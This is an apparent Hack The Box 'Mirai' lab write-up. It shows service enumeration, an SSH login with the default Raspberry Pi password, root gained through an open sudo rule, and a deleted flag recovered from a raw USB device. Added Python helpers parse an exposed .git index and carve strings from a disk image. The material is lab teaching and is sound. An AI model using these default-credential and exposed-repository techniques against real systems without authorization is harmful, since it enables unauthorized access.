Disclaimer
The host penetrated in this article was legitimately authorized. The tools and methods used here are for learning and exchange only; do not use the tools or the penetration approach described in this article for any illegal purpose. The author accepts no responsibility for any consequences that result, nor for any misuse or damage caused.
Service enumeration
┌──(root💀kali)-[~/htb/Mirai]
└─# nmap -Pn -sV 10.10.10.48 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-12-11 07:58 EST
Nmap scan report for 10.10.10.48
Host is up (0.31s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
53/tcp open domain dnsmasq 2.76
80/tcp open http lighttpd 1.4.35
1935/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Port 80 serves the login page of a web application (not a CMS in the usual sense, but an admin interface):
Application: Pi-hole (a DNS-level ad blocker with a PHP web admin interface)
Version: Pi-hole Version v3.1.4 Web Interface Version v3.1 FTL Version v2.10
Port 32400 serves another web application:
Application: Plex Media Server
Version: Version 3.9.1
Directory brute-forcing on port 80
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48/admin
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.48/-admin_21-12-11_08-21-32.txt
Error Log: /root/dirsearch/logs/errors-21-12-11_08-21-32.log
Target: http://10.10.10.48/admin/
[08:21:33] Starting:
[08:21:42] 301 - 0B - /admin/.git -> http://10.10.10.48/admin/.git/
[08:21:42] 200 - 274B - /admin/.git/config
[08:21:42] 200 - 73B - /admin/.git/description
[08:21:42] 200 - 23B - /admin/.git/HEAD
[08:21:42] 200 - 240B - /admin/.git/info/exclude
[08:21:42] 200 - 182B - /admin/.git/logs/HEAD
[08:21:42] 200 - 182B - /admin/.git/logs/refs/heads/master
[08:21:42] 301 - 0B - /admin/.git/logs/refs/heads -> http://10.10.10.48/admin/.git/logs/refs/heads/
[08:21:42] 200 - 182B - /admin/.git/logs/refs/remotes/origin/HEAD
[08:21:42] 301 - 0B - /admin/.git/logs/refs -> http://10.10.10.48/admin/.git/logs/refs/
[08:21:42] 301 - 0B - /admin/.git/logs/refs/remotes/origin -> http://10.10.10.48/admin/.git/logs/refs/remotes/origin/
[08:21:42] 301 - 0B - /admin/.git/refs/heads -> http://10.10.10.48/admin/.git/refs/heads/
[08:21:42] 301 - 0B - /admin/.git/refs/remotes/origin -> http://10.10.10.48/admin/.git/refs/remotes/origin/
[08:21:42] 301 - 0B - /admin/.git/logs/refs/remotes -> http://10.10.10.48/admin/.git/logs/refs/remotes/
[08:21:42] 301 - 0B - /admin/.git/refs/remotes -> http://10.10.10.48/admin/.git/refs/remotes/
[08:21:42] 200 - 32B - /admin/.git/refs/remotes/origin/HEAD
[08:21:42] 200 - 41B - /admin/.git/refs/heads/master
[08:21:42] 200 - 11KB - /admin/.git/index
[08:21:42] 301 - 0B - /admin/.git/refs/tags -> http://10.10.10.48/admin/.git/refs/tags/
[08:21:42] 200 - 1KB - /admin/.github/ISSUE_TEMPLATE.md
[08:21:42] 200 - 1KB - /admin/.github/PULL_REQUEST_TEMPLATE.md
[08:21:42] 200 - 153B - /admin/.gitignore/
[08:21:43] 200 - 107B - /admin/.git/packed-refs
[08:21:43] 200 - 153B - /admin/.gitignore
[08:21:44] 200 - 648B - /admin/.pullapprove.yml
[08:21:48] 200 - 846B - /admin/CONTRIBUTING.md
[08:21:49] 200 - 2KB - /admin/README.md
[08:21:49] 200 - 14KB - /admin/LICENSE
[08:22:12] 200 - 186B - /admin/api.php
[08:22:24] 200 - 14KB - /admin/debug.php
[08:22:35] 301 - 0B - /admin/img -> http://10.10.10.48/admin/img/
[08:22:36] 200 - 14KB - /admin/index.php
[08:22:36] 200 - 14KB - /admin/index.php/login/
[08:23:01] 301 - 0B - /admin/scripts -> http://10.10.10.48/admin/scripts/
[08:23:02] 200 - 14KB - /admin/settings.php
[08:23:07] 301 - 0B - /admin/style -> http://10.10.10.48/admin/style/
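The scan above shows that /admin/.git/ is served by lighttpd: HEAD, config, index, logs and refs all return 200. The writeup does not pursue this, and since the directory also contains README.md, LICENSE and .github/ templates it most likely mirrors a public checkout of the Pi-hole admin interface, so the main value is confirming that nothing private was committed on top. The following is an added example, not code from the writeup or from the Pi-hole project: it confirms that a fetched .git/HEAD really is a git ref (a catch-all 200 page would otherwise fool a dirsearch-style check) and lists the tracked paths by parsing .git/index offline, without a full git-dumper run. The index bytes are constructed in the file; the base URL in fetch_git_paths is an assumption and that helper is not exercised here.

```python
"""Added example (not the writeup's own code): confirm that /admin/.git is
readable and list the paths it tracks by parsing .git/index offline.
The sample index is constructed in this file; the live fetch helper is
provided for authorized use only and is not exercised here."""
import hashlib
import struct
import urllib.request
from typing import List


def looks_like_git_head(body: bytes) -> bool:
    """A real .git/HEAD is 'ref: refs/heads/<branch>' or a bare 40-hex SHA-1;
    anything else (an HTML 404 page, a soft redirect) is not an exposed repo."""
    text = body.decode("ascii", "replace").strip()
    if text.startswith("ref: refs/"):
        return True
    return len(text) == 40 and all(c in "0123456789abcdef" for c in text)


def parse_index_paths(data: bytes) -> List[str]:
    """Return the tracked paths from a git index file (format versions 2 and 3).

    Layout: 12-byte header (b'DIRC', version, entry count), then one entry per
    tracked file: 62 fixed bytes (stat data, SHA-1, 16-bit flags), the
    NUL-terminated path, and NUL padding so the entry is a multiple of 8 bytes.
    """
    if data[:4] != b"DIRC":
        raise ValueError("not a git index: missing DIRC signature")
    version, count = struct.unpack(">II", data[4:12])
    if version not in (2, 3):
        raise ValueError(f"unsupported index version {version}")
    paths, pos = [], 12
    for _ in range(count):
        flags = struct.unpack(">H", data[pos + 60:pos + 62])[0]
        fixed = 62 + (2 if version == 3 and flags & 0x4000 else 0)  # v3 extended-flags word
        end = data.index(b"\x00", pos + fixed)
        paths.append(data[pos + fixed:end].decode("utf-8", "replace"))
        pos += ((end - pos + 1) + 7) // 8 * 8  # entry length rounded up to a multiple of 8
    return paths


def build_sample_index(paths: List[str]) -> bytes:
    """Constructed sample: a minimal version-2 index with zeroed stat fields
    and SHA-1s, enough to exercise the parser without a real repository."""
    body = struct.pack(">4sII", b"DIRC", 2, len(paths))
    for p in paths:
        name = p.encode("utf-8")
        entry = b"\x00" * 60 + struct.pack(">H", min(len(name), 0xFFF)) + name + b"\x00"
        entry += b"\x00" * (-len(entry) % 8)
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing checksum over everything before it


def fetch_git_paths(base_url: str, timeout: float = 10.0) -> List[str]:
    """Live check against an authorized target, e.g. base_url='http://10.10.10.48/admin'
    (assumed URL). Returns [] when HEAD does not look like a git ref, so a
    catch-all 200 page is not mistaken for an exposed repository."""
    with urllib.request.urlopen(base_url + "/.git/HEAD", timeout=timeout) as resp:
        if not looks_like_git_head(resp.read()):
            return []
    with urllib.request.urlopen(base_url + "/.git/index", timeout=timeout) as resp:
        return parse_index_paths(resp.read())


# Paths taken from the dirsearch output above; the index bytes themselves are constructed.
SAMPLE_PATHS = ["README.md", "api.php", "debug.php", "index.php", "settings.php"]

if __name__ == "__main__":
    for path in parse_index_paths(build_sample_index(SAMPLE_PATHS)):
        print(path)
```

Reading only HEAD and index keeps the check to two small GETs; pulling objects to rebuild source is a separate step, and on a public-project checkout it rarely yields more than the upstream repository already shows.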
Directory brute-forcing on port 32400
┌──(root💀kali)-[~/dirsearch]
└─# python3 dirsearch.py -e* -t 100 -u http://10.10.10.48:32400/web
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_|)
Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492
Output File: /root/dirsearch/reports/10.10.10.48-32400/-web_21-12-11_09-55-31.txt
Error Log: /root/dirsearch/logs/errors-21-12-11_09-55-31.log
Target: http://10.10.10.48:32400/web/
[09:55:33] Starting:
[09:55:40] 200 - 0B - /web/js
[09:56:15] 200 - 0B - /web/common
[09:56:15] 200 - 0B - /web/common/
[09:56:20] 200 - 0B - /web/desktop/
[09:56:25] 200 - 5KB - /web/favicon.ico
[09:56:30] 200 - 0B - /web/img
[09:56:32] 200 - 4KB - /web/index.html
[09:56:32] 200 - 0B - /web/js/
[09:57:04] 200 - 0B - /web/swf
Initial shell
Some Googling shows that Pi-hole is a lightweight ad blocker that is usually installed on a Raspberry Pi. The SSH banner from nmap (OpenSSH 6.7p1 Debian 5+deb8u3, i.e. Debian 8 "jessie") also fits a Raspbian image of that era.
So the target is very likely a Raspberry Pi, and the default SSH credentials on Raspbian are pi:raspberry.
Try logging in:
┌──(root💀kali)-[~/htb/Mirai]
└─# ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.
pi@raspberrypi:~ $ whoami
pi
pi@raspberrypi:~ $ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),117(i2c),998(gpio),999(spi)
Login successful! The hostname raspberrypi and the unchanged-default-password warning confirm the guess.
Privilege escalation
Check the sudo rules:
pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
The second rule lets pi run any command as any user with NOPASSWD, so we can switch straight to root. Then locate user.txt:
pi@raspberrypi:~ $ sudo su
root@raspberrypi:/home/pi# find / -name user.txt
/home/pi/Desktop/user.txt
root.txt is not the real flag; the copy in /root points at a backup on a USB stick:
root@raspberrypi:/home/pi# find / -name root.txt
/lib/live/mount/persistence/sda2/root/root.txt
/root/root.txt
root@raspberrypi:/home/pi# cat /root/root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
List the block devices:
root@raspberrypi:/media# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 10G 0 disk
├─sda1 8:1 0 1.3G 0 part /lib/live/mount/persistence/sda1
└─sda2 8:2 0 8.7G 0 part /lib/live/mount/persistence/sda2
sdb 8:16 0 10M 0 disk /media/usbstick
sr0 11:0 1 1024M 0 rom
loop0 7:0 0 1.2G 1 loop /lib/live/mount/rootfs/filesystem.squashfs
The USB stick is sdb, a 10 MB disk mounted at /media/usbstick. Look inside:
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
The files have been deleted, so recovering root.txt takes a little more work.
Look at /dev/sdb itself: the leading b in the mode string shows it is a block device node, which root (or a member of the disk group; pi is not one, per the id output above) can read raw. Deleting a file from an ext filesystem only unlinks the directory entry and frees the inode and data blocks; the block contents are not zeroed, so the old data is still on the device unless something has overwritten it.
root@raspberrypi:/media/usbstick# ls -alh /dev/sdb
brw-rw---- 1 root disk 8, 16 Dec 11 12:53 /dev/sdb
Run strings directly against /dev/sdb:
root@raspberrypi:/home/pi# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
{root.txt contents here}
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
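The strings output above works because the unlinked file's data block is still on the device, sitting right after the directory names and the surviving damnit.txt. The following is an added example, not code from the writeup: a small pure-Python equivalent of the strings and grep -a approach that scans a raw device image, reports each printable run with its byte offset, and carves 32-hex-character HTB-style flags with a regex. DISK is a constructed stand-in for /dev/sdb laid out as four 512-byte blocks, and DELETED_CONTENT is a dummy value, not the real flag.

```python
"""Added example (not the writeup's own code): recover a file that was
deleted from the USB stick by scanning the raw block device. rm on an
ext2/3/4 filesystem unlinks the directory entry and frees the inode and
data blocks, but it does not zero them, so the names and the old contents
stay on disk until something overwrites them. DISK is a constructed
stand-in for /dev/sdb; DELETED_CONTENT is a dummy value, not the real flag."""
import re
from typing import Iterator, List, Tuple

PRINTABLE = set(range(0x20, 0x7F)) | {0x09}
BLOCK = 512


def strings(data: bytes, min_len: int = 4) -> Iterator[Tuple[int, str]]:
    """Yield (offset, text) for runs of printable ASCII at least min_len long,
    the same thing `strings -t d` prints."""
    start = None
    for i, b in enumerate(data):
        if b in PRINTABLE:
            if start is None:
                start = i
        elif start is not None:
            if i - start >= min_len:
                yield start, data[start:i].decode("ascii")
            start = None
    if start is not None and len(data) - start >= min_len:
        yield start, data[start:].decode("ascii")


def carve(data: bytes, pattern: bytes, context: int = 0) -> List[Tuple[int, bytes]]:
    """Regex over the raw bytes with optional surrounding context,
    the programmatic form of `grep -a -o -b -E`."""
    hits = []
    for m in re.finditer(pattern, data):
        lo, hi = max(0, m.start() - context), min(len(data), m.end() + context)
        hits.append((m.start(), data[lo:hi]))
    return hits


def recover_hex_flags(data: bytes) -> List[str]:
    """HTB-style flags are 32 lowercase hex characters; the lookarounds stop a
    longer hex run (a hash in some other block, say) from producing a false hit."""
    return [m.decode("ascii") for _, m in carve(data, rb"(?<![0-9a-f])[0-9a-f]{32}(?![0-9a-f])")]


def _block(payload: bytes) -> bytes:
    """Pad a payload to one block, as the filesystem would on disk."""
    assert len(payload) <= BLOCK
    return payload.ljust(BLOCK, b"\x00")


DELETED_CONTENT = b"0123456789abcdef0123456789abcdef\n"  # constructed dummy, not the real flag
DISK = b"".join([
    _block(bytes(range(256)) * 2),  # block 0: binary noise standing in for superblock/bitmaps
    _block(b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"),  # block 1: directory names survive
    _block(b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
           b"Do you know if there is any way to get them back?\n-James\n"),  # block 2: damnit.txt
    _block(DELETED_CONTENT),  # block 3: data block of the unlinked root.txt
])

if __name__ == "__main__":
    for off, s in strings(DISK, min_len=8):
        print(f"{off:8d} {s}")
    print(recover_hex_flags(DISK))
```

On the target the same two steps are strings -n 8 /dev/sdb (a longer minimum length drops most of the >r & noise seen above) and grep -a -o -E '[0-9a-f]{32}' /dev/sdb. Read the device, never write to it, and on anything larger than this 10 MB stick take an image first (dd if=/dev/sdb of=/tmp/usb.img bs=1M) and scan the image instead.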
Summary
The key to this box is reading the services found in the scan, working out why they were set up, and from that which system they normally run on. Once the target is identified as a Raspberry Pi, the default Raspberry Pi SSH login gives the initial shell; an unrestricted NOPASSWD sudo rule gives root, and the deleted root.txt is carved out of the raw USB block device with strings.